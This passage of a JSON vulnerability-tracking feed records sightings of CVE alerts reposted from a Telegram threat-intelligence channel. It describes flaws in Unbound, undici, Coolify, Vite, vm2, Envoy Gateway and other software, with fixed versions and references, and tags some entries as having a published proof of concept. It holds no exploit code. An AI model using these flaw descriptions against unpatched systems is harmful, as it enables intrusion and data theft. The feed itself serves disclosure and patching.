https://access.redhat.com/errata/RHSA-2024:2696\n9. https://access.redhat.com/security/cve/CVE-2024-1488\n10. https://bugzilla.redhat.com/show_bug.cgi?id=2264183", "creation_timestamp": "2025-01-24T06:12:32.000000Z"}, {"uuid": "c7db6505-4c79-42de-9d14-9d455c1d2efb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:2587", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/2874", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1488\n\ud83d\udd39 Description: A vulnerability was found in Unbound due to incorrect default permissions, allowing any process outside the unbound group to modify the unbound runtime configuration. If a process can connect over localhost to port 8953, it can alter the configuration of unbound.service. This flaw allows an unprivileged attacker to manipulate a running instance, potentially altering forwarders, allowing them to track all queries forwarded by the local resolver, and, in some cases, disrupting resolving altogether.\n\ud83d\udccf Published: 2024-02-15T05:04:13.994Z\n\ud83d\udccf Modified: 2025-01-24T05:55:20.447Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1750\n2. https://access.redhat.com/errata/RHSA-2024:1751\n3. https://access.redhat.com/errata/RHSA-2024:1780\n4. https://access.redhat.com/errata/RHSA-2024:1801\n5. https://access.redhat.com/errata/RHSA-2024:1802\n6. https://access.redhat.com/errata/RHSA-2024:1804\n7. https://access.redhat.com/errata/RHSA-2024:2587\n8. https://access.redhat.com/errata/RHSA-2024:2696\n9. https://access.redhat.com/security/cve/CVE-2024-1488\n10. https://bugzilla.redhat.com/show_bug.cgi?id=2264183", "creation_timestamp": "2025-01-24T06:12:32.000000Z"}, {"uuid": "69aa763b-fce2-4696-8883-160dea5fbcd2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1801", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/2874", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1488\n\ud83d\udd39 Description: A vulnerability was found in Unbound due to incorrect default permissions, allowing any process outside the unbound group to modify the unbound runtime configuration. If a process can connect over localhost to port 8953, it can alter the configuration of unbound.service. This flaw allows an unprivileged attacker to manipulate a running instance, potentially altering forwarders, allowing them to track all queries forwarded by the local resolver, and, in some cases, disrupting resolving altogether.\n\ud83d\udccf Published: 2024-02-15T05:04:13.994Z\n\ud83d\udccf Modified: 2025-01-24T05:55:20.447Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1750\n2. https://access.redhat.com/errata/RHSA-2024:1751\n3. https://access.redhat.com/errata/RHSA-2024:1780\n4. https://access.redhat.com/errata/RHSA-2024:1801\n5. https://access.redhat.com/errata/RHSA-2024:1802\n6. https://access.redhat.com/errata/RHSA-2024:1804\n7. https://access.redhat.com/errata/RHSA-2024:2587\n8. https://access.redhat.com/errata/RHSA-2024:2696\n9. https://access.redhat.com/security/cve/CVE-2024-1488\n10. https://bugzilla.redhat.com/show_bug.cgi?id=2264183", "creation_timestamp": "2025-01-24T06:12:32.000000Z"}, {"uuid": "69cbc070-ab82-4b26-a167-5895a0ceef68", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1804", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/2874", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1488\n\ud83d\udd39 Description: A vulnerability was found in Unbound due to incorrect default permissions, allowing any process outside the unbound group to modify the unbound runtime configuration. If a process can connect over localhost to port 8953, it can alter the configuration of unbound.service. This flaw allows an unprivileged attacker to manipulate a running instance, potentially altering forwarders, allowing them to track all queries forwarded by the local resolver, and, in some cases, disrupting resolving altogether.\n\ud83d\udccf Published: 2024-02-15T05:04:13.994Z\n\ud83d\udccf Modified: 2025-01-24T05:55:20.447Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1750\n2. https://access.redhat.com/errata/RHSA-2024:1751\n3. https://access.redhat.com/errata/RHSA-2024:1780\n4. https://access.redhat.com/errata/RHSA-2024:1801\n5. https://access.redhat.com/errata/RHSA-2024:1802\n6. https://access.redhat.com/errata/RHSA-2024:1804\n7. https://access.redhat.com/errata/RHSA-2024:2587\n8. https://access.redhat.com/errata/RHSA-2024:2696\n9. https://access.redhat.com/security/cve/CVE-2024-1488\n10. https://bugzilla.redhat.com/show_bug.cgi?id=2264183", "creation_timestamp": "2025-01-24T06:12:32.000000Z"}, {"uuid": "10ff6b5a-dad6-4a91-9e75-a571e0d371b1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1750", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/2874", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1488\n\ud83d\udd39 Description: A vulnerability was found in Unbound due to incorrect default permissions, allowing any process outside the unbound group to modify the unbound runtime configuration. If a process can connect over localhost to port 8953, it can alter the configuration of unbound.service. This flaw allows an unprivileged attacker to manipulate a running instance, potentially altering forwarders, allowing them to track all queries forwarded by the local resolver, and, in some cases, disrupting resolving altogether.\n\ud83d\udccf Published: 2024-02-15T05:04:13.994Z\n\ud83d\udccf Modified: 2025-01-24T05:55:20.447Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1750\n2. https://access.redhat.com/errata/RHSA-2024:1751\n3. https://access.redhat.com/errata/RHSA-2024:1780\n4. https://access.redhat.com/errata/RHSA-2024:1801\n5. https://access.redhat.com/errata/RHSA-2024:1802\n6. https://access.redhat.com/errata/RHSA-2024:1804\n7. https://access.redhat.com/errata/RHSA-2024:2587\n8. https://access.redhat.com/errata/RHSA-2024:2696\n9. https://access.redhat.com/security/cve/CVE-2024-1488\n10. https://bugzilla.redhat.com/show_bug.cgi?id=2264183", "creation_timestamp": "2025-01-24T06:12:32.000000Z"}, {"uuid": "128ed1be-4826-4a36-a822-1640e4538a6a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1751", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/2874", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1488\n\ud83d\udd39 Description: A vulnerability was found in Unbound due to incorrect default permissions, allowing any process outside the unbound group to modify the unbound runtime configuration. If a process can connect over localhost to port 8953, it can alter the configuration of unbound.service. This flaw allows an unprivileged attacker to manipulate a running instance, potentially altering forwarders, allowing them to track all queries forwarded by the local resolver, and, in some cases, disrupting resolving altogether.\n\ud83d\udccf Published: 2024-02-15T05:04:13.994Z\n\ud83d\udccf Modified: 2025-01-24T05:55:20.447Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1750\n2. https://access.redhat.com/errata/RHSA-2024:1751\n3. https://access.redhat.com/errata/RHSA-2024:1780\n4. https://access.redhat.com/errata/RHSA-2024:1801\n5. https://access.redhat.com/errata/RHSA-2024:1802\n6. https://access.redhat.com/errata/RHSA-2024:1804\n7. https://access.redhat.com/errata/RHSA-2024:2587\n8. https://access.redhat.com/errata/RHSA-2024:2696\n9. https://access.redhat.com/security/cve/CVE-2024-1488\n10. https://bugzilla.redhat.com/show_bug.cgi?id=2264183", "creation_timestamp": "2025-01-24T06:12:32.000000Z"}, {"uuid": "a0f528d4-456e-407d-8a33-c91cf339c07a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1780", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/2874", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1488\n\ud83d\udd39 Description: A vulnerability was found in Unbound due to incorrect default permissions, allowing any process outside the unbound group to modify the unbound runtime configuration. If a process can connect over localhost to port 8953, it can alter the configuration of unbound.service. This flaw allows an unprivileged attacker to manipulate a running instance, potentially altering forwarders, allowing them to track all queries forwarded by the local resolver, and, in some cases, disrupting resolving altogether.\n\ud83d\udccf Published: 2024-02-15T05:04:13.994Z\n\ud83d\udccf Modified: 2025-01-24T05:55:20.447Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1750\n2. https://access.redhat.com/errata/RHSA-2024:1751\n3. https://access.redhat.com/errata/RHSA-2024:1780\n4. https://access.redhat.com/errata/RHSA-2024:1801\n5. https://access.redhat.com/errata/RHSA-2024:1802\n6. https://access.redhat.com/errata/RHSA-2024:1804\n7. https://access.redhat.com/errata/RHSA-2024:2587\n8. https://access.redhat.com/errata/RHSA-2024:2696\n9. https://access.redhat.com/security/cve/CVE-2024-1488\n10. https://bugzilla.redhat.com/show_bug.cgi?id=2264183", "creation_timestamp": "2025-01-24T06:12:32.000000Z"}, {"uuid": "f496be88-b5e2-421b-b9aa-fa7399c443f6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C76H-2CCP-4975", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/2434", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-22150\n\ud83d\udd39 Description: Undici is an HTTP/1.1 client. Starting in version 4.5.0 and prior to versions 5.28.5, 6.21.1, and 7.2.3, undici uses `Math.random()` to choose the boundary for a multipart/form-data request. It is known that the output of `Math.random()` can be predicted if several of its generated values are known. If there is a mechanism in an app that sends multipart requests to an attacker-controlled website, they can use this to leak the necessary values. Therefore, an attacker can tamper with the requests going to the backend APIs if certain conditions are met. This is fixed in versions 5.28.5, 6.21.1, and 7.2.3. As a workaround, do not issue multipart requests to attacker controlled servers.\n\ud83d\udccf Published: 2025-01-21T17:46:58.872Z\n\ud83d\udccf Modified: 2025-01-21T17:46:58.872Z\n\ud83d\udd17 References:\n1. https://github.com/nodejs/undici/security/advisories/GHSA-c76h-2ccp-4975\n2. https://github.com/nodejs/undici/commit/711e20772764c29f6622ddc937c63b6eefdf07d0\n3. https://github.com/nodejs/undici/commit/c2d78cd19fe4f4c621424491e26ce299e65e934a\n4. https://github.com/nodejs/undici/commit/c3acc6050b781b827d80c86cbbab34f14458d385\n5. https://hackerone.com/reports/2913312\n6. https://blog.securityevaluators.com/hacking-the-javascript-lottery-80cc437e3b7f\n7. https://github.com/nodejs/undici/blob/8b06b8250907d92fead664b3368f1d2aa27c1f35/lib/web/fetch/body.js#L113", "creation_timestamp": "2025-01-21T18:00:46.000000Z"}, {"uuid": "91c436bd-8385-4a12-9bbe-155565dd8a2a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WG8X-CGQ4-VJXJ", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/2947", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-22612\n\ud83d\udd39 Description: Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. Prior to version 4.0.0-beta.374, the missing authorization allows an authenticated user to retrieve any existing private keys on a coolify instance in plain text. If the server configuration of IP / domain, port (most likely 22) and user (root) matches with the victim's server configuration, then the attacker can execute arbitrary commands on the remote server. Version 4.0.0-beta.374 fixes the issue.\n\ud83d\udccf Published: 2025-01-24T16:43:49.448Z\n\ud83d\udccf Modified: 2025-01-24T16:43:49.448Z\n\ud83d\udd17 References:\n1. https://github.com/coollabsio/coolify/security/advisories/GHSA-wg8x-cgq4-vjxj", "creation_timestamp": "2025-01-24T17:05:03.000000Z"}, {"uuid": "413406c9-de61-4705-982f-2a1e3039a397", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C75V-42G3-XVCR", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3166", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-c75v-42g3-xvcr\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: The WP Triggers Lite WordPress plugin through 2.5.3 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.\n\ud83d\udccf Published: 2025-01-27T06:30:26Z\n\ud83d\udccf Modified: 2025-01-27T06:30:26Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-13094\n2. https://wpscan.com/vulnerability/7a75809e-824e-458e-bd01-50dadcea7713", "creation_timestamp": "2025-01-27T07:07:55.000000Z"}, {"uuid": "92fc734d-541a-4cf8-9c3e-2194f0d7f852", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CHC6-3MHW-PC4R", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3165", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-chc6-3mhw-pc4r\n\ud83d\udd25 CVSS Score: 3.5 (CVSS_V3)\n\ud83d\udd39 Description: An improper privilege management vulnerability in OTRS Generic Interface module allows change of the Ticket status even if the user only has ro permissions. \n\nThis issue affects: \n\n  *  OTRS 7.0.X\n\n  *  OTRS 8.0.X\n  *  OTRS 2023.X\n  *  OTRS 2024.X\n\n  *  ((OTRS)) Community Edition: 6.0.x\n\nProducts based on the ((OTRS)) Community Edition also very likely to be affected\n\ud83d\udccf Published: 2025-01-27T06:30:26Z\n\ud83d\udccf Modified: 2025-01-27T06:30:26Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-43446\n2. https://otrs.com/release-notes/otrs-security-advisory-2025-02", "creation_timestamp": "2025-01-27T07:07:54.000000Z"}, {"uuid": "ba46b325-4ae5-4d03-832d-75a5c6d11557", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X684-96HH-833X", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/2270", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-23209\n\ud83d\udd39 Description: Craft is a flexible, user-friendly CMS for creating custom digital experiences on the web and beyond. This is an remote code execution (RCE) vulnerability that affects Craft 4 and 5 installs where your security key has already been compromised. Anyone running an unpatched version of Craft with a compromised security key is affected. This vulnerability has been patched in Craft 5.5.8 and 4.13.8. Users who cannot update to a patched version, should rotate their security keys and ensure their privacy to help migitgate the issue.\n\ud83d\udccf Published: 2025-01-18T00:32:54.954Z\n\ud83d\udccf Modified: 2025-01-18T00:32:54.954Z\n\ud83d\udd17 References:\n1. https://github.com/craftcms/cms/security/advisories/GHSA-x684-96hh-833x\n2. https://github.com/craftcms/cms/commit/e59e22b30c9dd39e5e2c7fe02c147bcbd004e603\n3. https://craftcms.com/knowledge-base/securing-craft#keep-your-secrets-secret", "creation_timestamp": "2025-01-18T00:57:13.000000Z"}, {"uuid": "1e624661-70b8-46fb-8bbe-8cee6f572e94", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C59P-WQ67-24WX", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/2369", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-23221\n\ud83d\udd39 Description: Fedify is a TypeScript library for building federated server apps powered by ActivityPub and other standards. This vulnerability allows a user to maneuver the Webfinger mechanism to perform a GET request to any internal resource on any Host, Port, URL combination regardless of present security mechanisms, and forcing the victim\u2019s server into an infinite loop causing Denial of Service. Moreover, this issue can also be maneuvered into performing a Blind SSRF attack. This vulnerability is fixed in 1.0.14, 1.1.11, 1.2.11, and 1.3.4.\n\ud83d\udccf Published: 2025-01-20T16:49:31.738Z\n\ud83d\udccf Modified: 2025-01-20T16:49:31.738Z\n\ud83d\udd17 References:\n1. https://github.com/dahlia/fedify/security/advisories/GHSA-c59p-wq67-24wx\n2. https://github.com/dahlia/fedify/commit/8be3c2038eebf4ae12481683a1e809b314be3151\n3. https://github.com/dahlia/fedify/commit/c505eb82fcd6b5b17174c6659c29721bc801ab9a\n4. https://github.com/dahlia/fedify/commit/e921134dd5097586e4563ea80b9e8d1b5460a645", "creation_timestamp": "2025-01-20T16:59:19.000000Z"}, {"uuid": "160c4336-8b51-41cd-b11c-b9f8933e3d9f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:4591", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/2354", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-5042\n\ud83d\udd39 Description: A flaw was found in the Submariner project. Due to unnecessary role-based access control permissions, a privileged attacker can run a malicious container on a node that may allow them to steal service account tokens and further compromise other nodes and potentially the entire cluster.\n\ud83d\udccf Published: 2024-05-17T13:12:00.551Z\n\ud83d\udccf Modified: 2025-01-20T08:33:53.439Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:4591\n2. https://access.redhat.com/security/cve/CVE-2024-5042\n3. https://bugzilla.redhat.com/show_bug.cgi?id=2280921\n4. https://github.com/advisories/GHSA-2rhx-qhxp-5jpw", "creation_timestamp": "2025-01-20T08:59:25.000000Z"}, {"uuid": "3bf1ae40-106a-4c50-86a8-0944b62712fd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H2MG-4C7Q-W69V", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/2364", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-23219\n\ud83d\udd39 Description: WeGIA is an open source web manager with a focus on the Portuguese language and charitable institutions. A SQL Injection vulnerability was identified in the WeGIA application, specifically in the adicionar_cor.php endpoint. This vulnerability allows attackers to execute arbitrary SQL commands in the database, allowing unauthorized access to sensitive information. During the exploit, it was possible to perform a complete dump of the application's database, highlighting the severity of the flaw. This vulnerability is fixed in 3.2.10.\n\ud83d\udccf Published: 2025-01-20T15:47:39.681Z\n\ud83d\udccf Modified: 2025-01-20T15:47:39.681Z\n\ud83d\udd17 References:\n1. https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-h2mg-4c7q-w69v\n2. https://github.com/LabRedesCefetRJ/WeGIA/commit/ae9c859006143bd0087b3e6e48a0677e1fff5c7e", "creation_timestamp": "2025-01-20T16:01:43.000000Z"}, {"uuid": "ed4abf8d-c2b3-451d-a2d0-169a31a610c1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VG6X-RCGG-RJX6", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/2362", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-24010\n\ud83d\udd39 Description: Vite is a frontend tooling framework for javascript. Vite allowed any websites to send any requests to the development server and read the response due to default CORS settings and lack of validation on the Origin header for WebSocket connections. This vulnerability is fixed in 6.0.9, 5.4.12, and 4.5.6.\n\ud83d\udccf Published: 2025-01-20T15:53:30.929Z\n\ud83d\udccf Modified: 2025-01-20T15:53:30.929Z\n\ud83d\udd17 References:\n1. https://github.com/vitejs/vite/security/advisories/GHSA-vg6x-rcgg-rjx6", "creation_timestamp": "2025-01-20T16:01:41.000000Z"}, {"uuid": "593735e2-32ce-491a-89fe-bb5ce0d2ed3b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-P5GC-C584-JJ6V", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/2666", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-32313\n\ud83d\udd39 Description: vm2 is a sandbox that can run untrusted code with Node's built-in modules. In versions 3.9.17 and lower of vm2 it was possible to get a read-write reference to the node `inspect` method and edit options for `console.log`. As a result a threat actor can edit options for the `console.log` command. This vulnerability was patched in the release of version `3.9.18` of `vm2`. Users are advised to upgrade. Users unable to upgrade may make the `inspect` method readonly with `vm.readonly(inspect)` after creating a vm.\n\ud83d\udccf Published: 2023-05-15T19:45:13.963Z\n\ud83d\udccf Modified: 2025-01-22T21:42:56.955Z\n\ud83d\udd17 References:\n1. https://github.com/patriksimek/vm2/security/advisories/GHSA-p5gc-c584-jj6v\n2. https://github.com/patriksimek/vm2/commit/5206ba25afd86ef547a2c9d48d46ca7a9e6ec238\n3. https://gist.github.com/arkark/c1c57eaf3e0a649af1a70c2b93b17550\n4. https://github.com/patriksimek/vm2/releases/tag/3.9.18", "creation_timestamp": "2025-01-22T22:02:31.000000Z"}, {"uuid": "51f3d5c5-3f84-436f-8c54-fdda9d7c4746", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6GVJ-8VC5-8V3J", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/2669", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-32068\n\ud83d\udd39 Description: XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. In versions prior to 14.10.4 it's possible to exploit well known parameters in XWiki URLs to perform redirection to untrusted site. This vulnerability was partially fixed in the past for XWiki 12.10.7 and 13.3RC1 but there is still the possibility to force specific URLs to skip some checks, e.g. using URLs like `http:example.com` in the parameter would allow the redirect.  The issue has now been patched against all patterns that are known for performing redirects. This issue has been patched in XWiki 14.10.4 and 15.0. Users are advised to upgrade. There are no known workarounds for this vulnerability.\n\ud83d\udccf Published: 2023-05-15T20:53:09.228Z\n\ud83d\udccf Modified: 2025-01-22T21:37:24.611Z\n\ud83d\udd17 References:\n1. https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-6gvj-8vc5-8v3j\n2. https://github.com/xwiki/xwiki-platform/commit/e4f7f68e93cb08c25632c126356d218abf192d1e\n3. https://jira.xwiki.org/browse/XWIKI-20096\n4. https://jira.xwiki.org/browse/XWIKI-20549", "creation_timestamp": "2025-01-22T22:02:34.000000Z"}, {"uuid": "262b3fc5-1250-49c3-beee-2d9e94ceaddc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CW76-H7WR-RH77", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3127", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-cw76-h7wr-rh77\n\ud83d\udd25 CVSS Score: N/A (CVSS_V3)\n\ud83d\udd39 Description: Develocity (formerly Gradle Enterprise) before 2024.1.8 has Incorrect Access Control. Project-level access control configuration was introduced in Enterprise Config schema version 8. Migration functionality from schema version 8 to versions 9 and 10 (in affected vulnerable versions) does not include the projects section of the configuration. This leads to all of the project settings being reset to their defaults when the old schema is loaded. In the case of projects.enabled, the default is false. Thus, using an enterprise config v8 results in Project level access control being disabled, even if it was previously enabled, and previously restricted project information disclosed. Most commonly, this occurs when a Develocity instance is upgraded from an earlier version. Specifically, this occurs if: Develocity 2023.3.X is upgraded to 2023.4.X; Develocity 2023.3.X is upgraded to 2024.1.X up to and including 2024.1.7; or Develocity 2023.4.X is upgraded to 2024.1.X up to and including 2024.1.7. The flaw does not occur when upgrading to a fixed version. An upgrade can only be triggered via administrator access, and cannot be forced by an external attacker.\n\ud83d\udccf Published: 2025-01-26T09:30:32Z\n\ud83d\udccf Modified: 2025-01-26T09:30:32Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-46881\n2. https://security.gradle.com/advisory/2024-03", "creation_timestamp": "2025-01-26T10:06:15.000000Z"}, {"uuid": "c2f94328-46dd-4ac8-9af5-55440101676f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-844J-8V3Q-83RF", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3146", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-844j-8v3q-83rf\n\ud83d\udd25 CVSS Score: 4.1 (CVSS_V3)\n\ud83d\udd39 Description: IBM Cognos Mobile Client 1.1 iOS may be vulnerable to information disclosure through man in the middle techniques due to the lack of certificate pinning.\n\ud83d\udccf Published: 2025-01-26T18:30:32Z\n\ud83d\udccf Modified: 2025-01-26T18:30:32Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2023-38009\n2. https://www.ibm.com/support/pages/node/7172691\n3. https://www.ibm.com/support/pages/node/7172692", "creation_timestamp": "2025-01-26T19:07:26.000000Z"}, {"uuid": "217625fe-653b-4ea5-ad39-32f5e68d9b6c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-27C6-MCXV-X3FH", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/2780", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-24033\n\ud83d\udd39 Description: @fastify/multipart is a Fastify plugin for parsing the multipart content-type. Prior to versions 8.3.1 and 9.0.3, the `saveRequestFiles` function does not delete the uploaded temporary files when user cancels the request. The issue is fixed in versions 8.3.1 and 9.0.3. As a workaround, do not use `saveRequestFiles`.\n\ud83d\udccf Published: 2025-01-23T17:40:56.228Z\n\ud83d\udccf Modified: 2025-01-23T17:40:56.228Z\n\ud83d\udd17 References:\n1. https://github.com/fastify/fastify-multipart/security/advisories/GHSA-27c6-mcxv-x3fh\n2. https://github.com/fastify/fastify-multipart/issues/546\n3. https://github.com/fastify/fastify-multipart/pull/567", "creation_timestamp": "2025-01-23T18:03:12.000000Z"}, {"uuid": "e42a7f19-64f8-47c4-a939-690377a5e41d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-J777-63HF-HX76", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/2711", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-24030\n\ud83d\udd39 Description: Envoy Gateway is an open source project for managing Envoy Proxy as a standalone or Kubernetes-based application gateway. A user with access to the Kubernetes cluster can use a path traversal attack to execute Envoy Admin interface commands on proxies managed by any version of Envoy Gateway prior to 1.2.6. The admin interface can be used to terminate the Envoy process and extract the Envoy configuration (possibly containing confidential data). Version 1.2.6 fixes the issue. As a workaround, the `EnvoyProxy` API can be used to apply a bootstrap config patch that restricts access strictly to the prometheus stats endpoint. Find below an example of such a bootstrap patch.\n\ud83d\udccf Published: 2025-01-23T03:20:27.802Z\n\ud83d\udccf Modified: 2025-01-23T03:20:27.802Z\n\ud83d\udd17 References:\n1. https://github.com/envoyproxy/gateway/security/advisories/GHSA-j777-63hf-hx76\n2. https://github.com/envoyproxy/gateway/commit/3eb3301ab3dbf12b201b47bdb6074d1233be07bd\n3. https://www.envoyproxy.io/docs/envoy/latest/configuration/best_practices/edge\n4. https://www.envoyproxy.io/docs/envoy/latest/operations/admin", "creation_timestamp": "2025-01-23T04:02:49.000000Z"}, {"uuid": "65885aa2-aa37-4059-a213-5fa786358346", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-F5PH-J9M6-QJQC", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3164", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-f5ph-j9m6-qjqc\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: The Dyn Business Panel WordPress plugin through 1.0.0 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow 